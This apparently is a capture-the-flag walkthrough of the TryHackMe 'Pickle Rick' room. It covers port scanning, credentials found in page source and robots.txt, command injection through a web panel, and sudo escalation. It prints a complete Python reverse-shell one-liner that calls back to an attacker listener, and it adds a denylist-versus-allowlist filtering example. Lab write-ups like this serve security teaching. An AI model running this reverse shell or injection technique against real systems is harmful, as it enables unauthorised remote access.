Pickle Rick CTF TryHackMe Complete Walkthrough
A Rick and Morty CTF. Help turn Rick back into a human!
Let's start with old-school reconnaissance; the results are:
I used -sV to probe open ports and determine service/version info, -sC (equivalent to --script=default) and -oN to save the scan in normal output. The scan shows the SSH port open along with Apache HTTP on port 80. Alongside that I fired up gobuster to look for hidden directories, which turned up login.php and robots.txt, so I hopped over to http://your_ip/login.php
It looks like a username and password portal, so we need both credentials. Then I viewed the source code of the page,
where I found the username mentioned at the very end. As per my gobuster results, I also saw a strange string in robots.txt at http://your_ip/robots.txt, as shown:
Since I had the username and this anonymous text (looks like a weak password ;-) ), I entered both credentials and was able to log in.
It looks like a command panel, so I tried different commands to see what's inside. There are different types of files such as clue.txt, index.html, login.php, portal.php, robots.txt, etc., but when I tried to read them it showed that the command was denied ;-(
Then I saw that the panel lets us inject Python commands: for example, I typed print hello3 and it was executed. So I created a Python reverse shell back to my Kali machine with nc listening on it, so I could see what's behind the scenes :-0. I tried Python 2 first but the page was not accepting it, so I used Python 3, which worked.
So I created a reverse shell using Python:
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("your_ip", your_listeningport));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
On the Kali side I used nc with -l for listen mode (inbound connections), -n for numeric-only IP addresses (no DNS resolution), -v for verbose output and -p for the port to listen on.
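The "command denied" behaviour above is a keyword denylist, which an interpreter such as python3 walks straight past. As an added example (not the room's own portal.php; the denied words and the allowlist are assumptions), here is that denylist beside an allowlist that runs only a fixed set of binaries with no shell at all:

```python
import re
import shlex
import subprocess

# --- Denylist: the pattern the panel above relies on. It blocks a few
# file-reading commands by keyword, but an interpreter such as python3 is
# not on the list, so arbitrary code still runs. (Word list is assumed.)
DENIED_WORDS = {"cat", "head", "tail", "more", "less"}

def denylist_allows(cmdline: str) -> bool:
    """True if the denylist filter would let this command line through."""
    try:
        tokens = shlex.split(cmdline)
    except ValueError:          # unbalanced quotes: refuse
        return False
    return not any(tok in DENIED_WORDS for tok in tokens)

# --- Allowlist: only a fixed set of binaries, each argument restricted to a
# harmless character class, executed as an argv list with no shell.
ALLOWED_BINARIES = {"ls", "whoami", "pwd"}
ARG_RE = re.compile(r"[A-Za-z0-9._-]+")

def allowlist_parse(cmdline: str):
    """Return argv if the command is permitted under the allowlist, else None."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:
        return None
    if not argv or argv[0] not in ALLOWED_BINARIES:
        return None
    if not all(ARG_RE.fullmatch(arg) for arg in argv[1:]):
        return None
    return argv

def run_allowed(cmdline: str) -> str:
    """Execute only allowlisted commands; shell=False means ';', '$()' and
    quoting tricks are never interpreted, only passed as literal arguments."""
    argv = allowlist_parse(cmdline)
    if argv is None:
        return "command denied"
    return subprocess.run(argv, capture_output=True, text=True).stdout

if __name__ == "__main__":
    for line in ("ls -la", "cat clue.txt", "python3 -c 'print(1)'"):
        print(f"{line!r:28} denylist={denylist_allows(line)} "
              f"allowlist={allowlist_parse(line) is not None}")
```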
Looks like there are different types of files
I thought: why not check all the sudo permissions ;-)
As no password is required, I hopped over to list the root directory, where I can see the third text, as shown:
Cat all the files, and you will be able to answer all the required questions on TryHackMe. That's all for now.
Until next time,
Stay COOOL!,
This is Neelesh Patel aka cyberbreath signing off!!